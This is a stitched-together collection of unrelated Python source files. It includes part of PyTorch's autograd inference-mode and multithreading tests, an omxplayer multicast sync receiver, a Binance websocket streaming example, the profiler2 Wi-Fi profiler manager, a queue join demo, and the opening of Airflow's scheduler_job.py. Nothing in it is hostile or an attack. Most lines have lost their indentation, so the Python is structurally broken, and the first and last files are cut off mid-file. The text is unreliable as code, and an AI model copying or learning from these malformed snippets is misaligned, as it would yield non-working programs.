tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
                # tensor argument, so there is no mixed inference and normal
                # tensor input scenario for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
                # this is fine since it's equivalent to s.view(c.sizes()), which
                # isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
class PropagatingThread(threading.Thread):
'''Helper class to propagate exception from child
thread to main thread on join.
Reference: https://stackoverflow.com/a/31614591/5602957
'''
def run(self):
self.exception = None
try:
self.ret = super(PropagatingThread, self).run()
except Exception as e:
self.exception = e
def join(self, timeout=None):
super(PropagatingThread, self).join(timeout)
if self.exception:
raise self.exception from self.exception
return self.ret
threads = []
for _ in range(num_threads):
p = PropagatingThread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
def test_multithreaded_exception_propagation(self):
# Test whether exception in child thread
# are propagated to main thread.
def fn():
self.assertTrue(False)
with self.assertRaises(AssertionError):
self._run_py_multithread_fn(fn)
def test_simple_backward(self):
        # simple multithreaded backward that creates threads at the beginning of training
        # and trains everything separately per thread, i.e. inputs, operations, etc.
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (i.e. This is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, when we do backward
# concurrently, different backwards will all accumulate to
# the same .grad for each input, and the gradients should
# be equal to num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
        # since we use the functional grad() API, gradients will not
        # be accumulated in the same place and should be the same
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_multithread_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
def registers_hooks_for_each_thread():
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
x = torch.ones(5, 5, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
y = x * x
# should raise two warnings from x being saved twice
self.assertEqual(len(w), 2)
y.sum().backward()
def test_dataparallel_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
_self = self
class Model(torch.nn.Module):
def forward(self, x):
with warnings.catch_warnings(record=True) as w:
y = x * x
if torch.cuda.device_count() >= 2:
                        # DataParallel is calling the forward in different threads
                        # without propagating TLS, so hooks should not be called here
_self.assertEqual(len(w), 0)
else:
# DataParallel only uses one thread
# so hooks should be called here
_self.assertGreater(len(w), 0)
x = torch.ones(5, 5, requires_grad=True)
model = torch.nn.DataParallel(Model())
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
model(x)
with warnings.catch_warnings(record=True) as w:
y = x * x
# hooks should be called here
_self.assertGreater(len(w), 0)
def test_python_thread_in_middle(self):
# User might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is being shared across
        # different threads and we need to ensure the user specifies retain_graph=True,
        # otherwise we error out with the correct error message
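        # Concretely: each thread builds its own `y = x + x ** 2` on top of a shared
        # lower graph (x_no_retain -> y_no_retain below), so every backward() call
        # walks the same shared nodes; the first call to finish frees their buffers
        # and the remaining threads then need retain_graph=True to succeed.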
# Case 1: multiple backward with python threads, retain_graph=False
# should throw error in some threads with no retain_graph.
success_vs_raises = [0, 0]
def train_fn_no_retain_graph(x):
y = x + x ** 2
try:
y.sum().backward()
success_vs_raises[0] += 1
except RuntimeError as error:
success_vs_raises[1] += 1
self.assertRegex(str(error), "Specify retain_graph=True")
x_no_retain = torch.ones(5, 5, requires_grad=True)
y_no_retain = x_no_retain + x_no_retain ** 2
self._run_py_multithread_fn(train_fn_no_retain_graph, (y_no_retain,), num_threads=5)
        # at least one thread will succeed in this case; all other threads should raise
        # an error recommending that the user specify retain_graph=True
self.assertTrue(success_vs_raises[0] >= 1)
# multiple backward with python threads, no error with retain_graph=True
def train_fn_retain_graph(x):
y = x + x ** 2
y.sum().backward(retain_graph=True)
x_retain = torch.ones(5, 5, requires_grad=True)
y_retain = x_retain + x_retain ** 2
self._run_py_multithread_fn(train_fn_retain_graph, (y_retain,), num_threads=5)
        # result should equal num_threads * gradient
self.assertEqual(x_retain.grad, 5 * (4 * x_retain ** 3 + 6 * (x_retain ** 2) + 4 * x_retain + 1))
def test_fork_join_in_middle(self):
# multiple backward with jit threads (fork/join primitive)
# similar to test_python_thread_in_middle, we test with retain_graph=False/True
# Case 1: multiple grad() calls with jit threads, retain_graph=False
# should throw error in some threads with no retain_graph.
@torch.jit.script
def train_fn_jit_no_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x])
@torch.jit.script
def train_fn_fork_join_calls_no_retain(x):
y_no_retain = (x + 3) * (x + 4) * 0.5
fut = torch.jit._fork(train_fn_jit_no_retain, y_no_retain, x)
grad_hat = train_fn_jit_no_retain(y_no_retain, x)
grad = torch.jit._wait(fut)
return grad, grad_hat
try:
train_fn_fork_join_calls_no_retain(torch.randn(5, 5, requires_grad=True))
except RuntimeError as error:
self.assertRegex(str(error), "Specify retain_graph=True")
# Case 2: no error with retain_graph=True
@torch.jit.script
def train_fn_jit_retain(middle, orig_x):
y = middle + middle ** 2
return torch.autograd.grad([y.sum()], [orig_x], retain_graph=True)
@torch.jit.script
def train_fn_fork_join_calls_retain(x):
y_retain = (x + 3) * (x + 4) * 0.5
fut1 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
fut2 = torch.jit._fork(train_fn_jit_retain, y_retain, x)
grad = train_fn_jit_retain(y_retain, x)
grad1 = torch.jit._wait(fut1)
grad2 = torch.jit._wait(fut2)
return grad, grad1, grad2
grad, grad1, grad2 = train_fn_fork_join_calls_retain(torch.randn(5, 5, requires_grad=True))
self.assertEqual(grad, grad1)
self.assertEqual(grad, grad2)
def test_preserve_backtrace(self):
class Foo(torch.autograd.Function):
@staticmethod
def forward(ctx, input):
return input
@staticmethod
def backward(ctx, *grad):
raise ValueError("something")
t = torch.rand(10, requires_grad=True)
try:
Foo.apply(t).sum().backward()
except Exception:
import traceback
tb = sys.exc_info()[2]
tb_str = "\n".join(traceback.format_tb(tb))
self.assertTrue('raise ValueError("something")' in tb_str)
# TODO(@anjali411): add an OpInfo based test for torch.cat
# Issue: https://github.com/pytorch/pytorch/issues/51627
def test_cat_r_to_c(self):
inp_c = torch.rand(3, 2, dtype=torch.cdouble, requires_grad=True)
inp_r = torch.randn(3, 2, dtype=torch.double, requires_grad=True)
def fn(x1, x2):
return torch.cat((x1, x2), dim=-1)
torch.autograd.gradcheck(fn, [inp_r, inp_c], check_forward_ad=True)
torch.autograd.gradcheck(fn, [inp_c, inp_r], check_forward_ad=True)
# Import test cases from below autograd/ here. These are found
# implicitly by the loader, so Flake8 thinks they are unused, hence
# the suppressions.
from autograd.test_complex import TestAutogradComplex # noqa: F401
# e.g., TestAutogradDeviceTypeCPU and TestAutogradDeviceTypeCUDA
instantiate_device_type_tests(
TestAutogradDeviceType,
globals(),
except_for=None
)
if __name__ == '__main__':
run_tests()
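# Note: instantiate_device_type_tests() above generates one concrete TestCase per
# available device, so a single generated test can be selected with unittest's -k
# filter when running this file directly, e.g. (illustrative invocation, exact names
# depend on the devices present): python test_autograd.py -k test_where_functional_cpu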
|
receiver.py
|
import socket
import struct
from dbus import DBusException
import collections
from threading import Thread
from time import sleep
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 1666
DEFAULT_MULTICAST = '224.0.0.160'
DEFAULT_BIG_TOLERANCE = 3 # amount of deviation above which a large sync should be performed
DEFAULT_TOLERANCE = .05 # margin that is considered acceptable for slave to be ahead or behind
DEFAULT_GRACE_TIME = 3 # amount of time to wait with re-syncs after a resync
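# Protocol sketch: the master periodically multicasts its state as a single UTF-8
# datagram of the form "<position>%<duration>%<playback_status>" (see _receive_data
# below). This Receiver joins the multicast group, compares the master position with
# the local omxplayer position and either nudges the playback rate (small sync) or
# seeks straight to the master position (big sync).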
class Receiver:
def __init__(self, omxplayer, verbose=False, big_tolerance=DEFAULT_BIG_TOLERANCE, tolerance=DEFAULT_TOLERANCE,
                 grace_time=DEFAULT_GRACE_TIME, host=DEFAULT_HOST, port=DEFAULT_PORT, multicast=DEFAULT_MULTICAST,
background=True, interface=None):
# config
self.player = omxplayer
self.verbose = verbose if type(verbose) is bool else False
self.big_tolerance = big_tolerance if type(big_tolerance) in (int, float) else DEFAULT_BIG_TOLERANCE
self.tolerance = tolerance if type(tolerance) in (int, float) else DEFAULT_TOLERANCE
self.grace_time = grace_time if type(grace_time) in (int, float) else DEFAULT_GRACE_TIME
self.host = self.test_host(host, DEFAULT_HOST)
self.port = port if type(port) is int else DEFAULT_PORT
        self.multicast = self.test_host(multicast, DEFAULT_MULTICAST)
self.background = background if type(background) is bool else True
self.interface = interface
# attributes
self.socket = None
self.received_position = None
self.received_duration = None
self.received_status = None
self.paused_until = None
self.deviation = 0
self.deviations = collections.deque(maxlen=10)
self.median_deviation = 0
self.duration_match = None
self.rate = 1
self.update_thread = None
self.message = " "
self.net_errors = 0
self.master_addr = None
self.setup()
if self.background is True:
self.start_thread()
def __del__(self):
self.destroy()
    def test_host(self, host, default):
        # return `host` only if it looks like a dotted-quad IPv4 address,
        # otherwise fall back to `default`
        host_test = host.split('.', 3)
        try:
            if len(host_test) == 4 and all(0 <= int(item) <= 255 for item in host_test):
                return host
        except ValueError:
            pass
        return default
def setup(self):
# create socket connections
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
# non-blocking, please
self.socket.setblocking(0)
# bind to configured host/port
self.socket.bind((self.host, self.port))
        # build the membership request for the multicast group
        # (INADDR_ANY lets the kernel pick the interface)
        group = socket.inet_aton(self.multicast)
        mreq = struct.pack('4sl', group, socket.INADDR_ANY)
        if self.interface is not None:
            # option 25 is SO_BINDTODEVICE on Linux: restrict the socket to one interface
            self.socket.setsockopt(socket.SOL_SOCKET, 25, self.interface)
        self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
if self.verbose:
print('Connection set up')
def start_thread(self):
self.update_thread = Thread(target=self.update_loop)
self.update_thread.start()
def destroy(self):
if self.socket:
self.socket.close()
self.socket = None
def update_loop(self):
while True:
try:
self.update()
except DBusException:
self.socket.close()
break
def update(self):
        # keep receiving data so we don't get a whole batch of stale data later
data = self._receive_data()
local_pos = self.player.position()
if local_pos is None: # we'll need our own local position
return
local_status = self.player.playback_status()
if local_status is None:
return
# no data? no action.
if not data:
return
# store received data
self.received_position = float(data[0])
self.received_duration = float(data[1])
self.received_status = data[2]
if local_status != self.received_status:
self.player.play_pause()
if self.received_status == 'Paused':
return
# calculate current deviation based on newly received master position
self.deviation = self.received_position - local_pos
self.message = 'Master: %.2f/%.2f (deviation: %.2f, %s, rate: %s)' % \
(self.received_duration, self.received_position, self.deviation, local_status, self.rate)
if self.verbose:
print(self.message)
# check file; if master is playing a different file, then there is no use in time-syncing
if self.duration_match is None:
if abs(self.received_duration - float(self.player.duration())) > 1:
                print('Error: durations of files do not match! Master:{} Slave:{}'.format(self.received_duration, self.player.duration()))
return
else:
self.duration_match = True
# calculate median deviation
self.deviations.append(self.deviation)
self.median_deviation = self._calculate_median(list(self.deviations))
if self.verbose:
print('PositionReceiver.median_deviation: ' + str(self.median_deviation))
# still at start or end of video, don't sync
if self.received_position <= self.grace_time: # or self.player.position() <= self.grace_time:
return
if (self.received_duration - local_pos) < self.grace_time:
if self.rate != 1:
self._reset_small_sync()
return
# not deviated very much, nothing to sync
if abs(self.median_deviation) <= self.tolerance:
if self.rate != 1:
self._reset_small_sync()
return
# ok, let's do some syncing
self.deviations.clear()
if abs(self.median_deviation) >= self.big_tolerance:
self._perform_big_sync()
return
self._perform_small_sync()
def _receive_data(self):
try:
# read incoming socket data
data = self.socket.recv(1024)
pos, duration, playback_status = data.decode('utf-8').split('%', 2)
self.net_errors = 0
return (pos, duration, playback_status)
except Exception as e:
self.net_errors += 1
if self.net_errors > 20:
self.message = "Error: Network is unreachable"
if self.verbose:
print(self.message)
print(e)
return None
def _calculate_median(self, lst):
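        # e.g. [0.2, -0.1, 0.3, 0.0] sorts to [-0.1, 0.0, 0.2, 0.3] and the two middle
        # values average to 0.1; for an odd-length list the single middle element is
        # returned as-is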
quotient, remainder = divmod(len(lst), 2)
if remainder:
return sorted(lst)[quotient]
return float(sum(sorted(lst)[quotient - 1:quotient + 1]) / 2.0)
    def _perform_small_sync(self):
        # nudge the playback rate towards the master: omxplayer action 1 decreases
        # the playback speed one step, action 2 increases it one step
        if self.deviation < 0 and self.rate > 0.98:
            self.player.action(1)
        elif self.deviation > 0 and self.rate < 1.24:
            self.player.action(2)
        self.rate = float(self.player.rate())
    def _reset_small_sync(self):
        # undo a previous small sync by stepping the playback rate back towards 1.0
        if self.rate == 0.975:
            self.player.action(2)
        elif self.rate == 1.125:
            self.player.action(1)
        self.rate = float(self.player.rate())
def _perform_big_sync(self):
# jump to master position
self._reset_small_sync()
self.player.set_position(self.received_position)
if self.verbose:
print("jumped to position {0:2f}".format(self.received_position))
|
dev_stream_everything_and_unicorn_fy.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_stream_everything_and_unicorn_fy.py
#
# Part of ‘UnicornFy’
# Project website: https://www.lucit.tech/unicorn-fy.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-fy
# Documentation: https://unicorn-fy.docs.lucit.tech/
# PyPI: https://pypi.org/project/unicorn-fy
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
from unicorn_fy.unicorn_fy import UnicornFy
import logging
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`!")
sys.exit(1)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.getLogger("unicorn_fy")
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is not False:
unicorn_fied_data = UnicornFy.binance_com_websocket(oldest_stream_data_from_stream_buffer)
print(str(unicorn_fied_data))
else:
time.sleep(0.01)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
markets = []
try:
binance_rest_client = Client(binance_api_key, binance_api_secret)
binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
print("No internet connection?")
sys.exit(1)
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
data = binance_rest_client.get_all_tickers()
for item in data:
markets.append(item['symbol'])
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
userdata_stream_id = binance_websocket_api_manager.create_stream(["!userData"], ["arr"])
arr_stream_id = binance_websocket_api_manager.create_stream(arr_channels, "arr")
for channel in channels:
binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
stream_id_trade = binance_websocket_api_manager.get_stream_id_by_label("trade")
binance_websocket_api_manager.get_stream_subscriptions(stream_id_trade)
#while True:
# binance_websocket_api_manager.print_summary()
# time.sleep(1)
|
manager.py
|
# -*- coding: utf-8 -*-
#
# profiler2: a Wi-Fi client capability analyzer
# Copyright 2020 Josh Schmelzle
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
profiler2.manager
~~~~~~~~~~~~~~~~~
handle profiler
"""
# standard library imports
import inspect
import logging
import multiprocessing as mp
import os
import platform
import signal
import sys
from datetime import datetime
# third party imports
import scapy
from scapy.all import rdpcap
# app imports
from . import helpers
from .__version__ import __version__
def signal_handler(sig, frame):
""" Suppress stack traces when intentionally closed """
print("SIGINT or Control-C detected... exiting...")
sys.exit(0)
def are_we_root() -> bool:
""" Do we have root permissions? """
if os.geteuid() == 0:
return True
else:
return False
def start(args: dict):
""" Begin work """
log = logging.getLogger(inspect.stack()[0][3])
if args.pytest:
sys.exit("pytest")
if not are_we_root():
log.error("must run with root permissions... exiting...")
sys.exit(-1)
signal.signal(signal.SIGINT, signal_handler)
helpers.setup_logger(args)
log.debug("%s version %s", __name__.split(".")[0], __version__)
log.debug("python platform version is %s", platform.python_version())
log.debug("scapy version is %s", scapy.__version__)
log.debug("args: %s", args)
if args.oui_update:
sys.exit(0) if helpers.update_manuf() else sys.exit(-1)
config = helpers.setup_config(args)
if helpers.validate(config):
log.debug("config %s", config)
else:
log.error("configuration validation failed... exiting...")
sys.exit(-1)
if args.clean and args.files:
clients_dir = os.path.join(config["GENERAL"].get("files_path"), "clients")
helpers.files_cleanup(clients_dir, args.yes)
sys.exit(0)
if args.clean:
reports_dir = os.path.join(config["GENERAL"].get("files_path"), "reports")
helpers.files_cleanup(reports_dir, args.yes)
sys.exit(0)
interface = config.get("GENERAL").get("interface")
channel = int(config.get("GENERAL").get("channel"))
pcap_analysis = config.get("GENERAL").get("pcap_analysis")
listen_only = config.get("GENERAL").get("listen_only")
queue = mp.Queue()
log.debug("%s pid %s", __name__, os.getpid())
if pcap_analysis:
log.info("not starting beacon or sniffer - user wants to do file analysis only")
try:
frame = rdpcap(pcap_analysis)
except FileNotFoundError:
log.exception("could not find file %s", pcap_analysis)
print("exiting...")
sys.exit(-1)
# extract the first frame object from pcap
assoc_req_frame = frame[0]
# put frame into the multiprocessing queue for the profiler to analyze
queue.put(assoc_req_frame)
else:
helpers.generate_run_message(config)
from .fakeap import Sniffer, TxBeacons
boot_time = datetime.now().timestamp()
lock = mp.Lock()
sequence_number = mp.Value("i", 0)
if args.no_interface_prep:
log.warning("skipping interface prep...")
else:
log.info("start interface prep...")
if not helpers.prep_interface(interface, "monitor", channel):
log.error("failed to prep interface")
print("exiting...")
sys.exit(-1)
log.info("done prep interface...")
if listen_only:
log.info("beacon process not started due to listen only mode")
else:
log.info("starting beacon process")
mp.Process(
name="txbeacons",
target=TxBeacons,
args=(config, boot_time, lock, sequence_number),
).start()
log.info("starting sniffer process")
mp.Process(
name="sniffer",
target=Sniffer,
args=(config, boot_time, lock, sequence_number, queue),
).start()
from .profiler import Profiler
log.info("starting profiler process")
mp.Process(name="profiler", target=Profiler, args=(config, queue)).start()
|
join_queue.py
|
import queue
import threading
import time
def do_work(item):
print(f'{threading.current_thread()} removed {item} from the queue')
def worker(queue):
time.sleep(1)
while not queue.empty():
item = queue.get()
if item is None:
print('item is none')
break
do_work(item)
queue.task_done()
q = queue.Queue()
for i in range(5):
q.put(i)
print('Queue populated')
# thread = threading.Thread(target=worker, args=(q,))
# thread.start()
print('Not Progressing Till Queue is Empty')
# fake task_done
q.task_done()
q.task_done()
q.task_done()
q.task_done()
q.task_done()
# q.join() blocks until task_done() has been called once for every item that was put()
q.join()
print('All queued tasks are marked done')
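# Note on the behaviour demonstrated above: queue.Queue.join() does not check
# whether the queue is empty; it only waits until task_done() has been called
# once for every item that was put(). Because the worker thread is commented
# out, the five manual task_done() calls are what unblock join() here, and the
# five items are still sitting in the queue afterwards. A minimal worker that
# pairs each get() with a task_done() would look like:
#
#   def draining_worker(q):
#       while True:
#           item = q.get()
#           do_work(item)
#           q.task_done()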
|
scheduler_job.py
|
# pylint: disable=no-name-in-module
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import itertools
import logging
import multiprocessing
import os
import sched
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout, suppress
from datetime import timedelta
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import Any, Callable, DefaultDict, Dict, Iterable, List, Optional, Set, Tuple
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_, tuple_
from sqlalchemy.exc import OperationalError
from sqlalchemy.orm import load_only, selectinload
from sqlalchemy.orm.session import Session, make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException, SerializedDagNotFound, TaskNotFound
from airflow.executors.executor_loader import UNPICKLEABLE_EXECUTORS
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagModel, SlaMiss, errors
from airflow.models.dagbag import DagBag
from airflow.models.dagrun import DagRun
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance, TaskInstanceKey
from airflow.settings import run_with_db_retries
from airflow.stats import Stats
from airflow.ti_deps.dependencies_states import EXECUTION_STATES
from airflow.utils import timezone
from airflow.utils.callback_requests import (
CallbackRequest,
DagCallbackRequest,
SlaCallbackRequest,
TaskCallbackRequest,
)
from airflow.utils.dag_processing import AbstractDagFileProcessorProcess, DagFileProcessorAgent
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.session import create_session, provide_session
from airflow.utils.sqlalchemy import is_lock_not_available_error, prohibit_commit, skip_locked, with_row_locks
from airflow.utils.state import State
from airflow.utils.types import DagRunType
TI = models.TaskInstance
DR = models.DagRun
DM = models.DagModel
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin, MultiprocessingStartMethodMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param callback_requests: failure callback to execute
:type callback_requests: List[airflow.utils.callback_requests.CallbackRequest]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(
self,
file_path: str,
pickle_dags: bool,
dag_ids: Optional[List[str]],
callback_requests: List[CallbackRequest],
):
super().__init__()
self._file_path = file_path
self._pickle_dags = pickle_dags
self._dag_ids = dag_ids
self._callback_requests = callback_requests
# The process that was launched to process the given file.
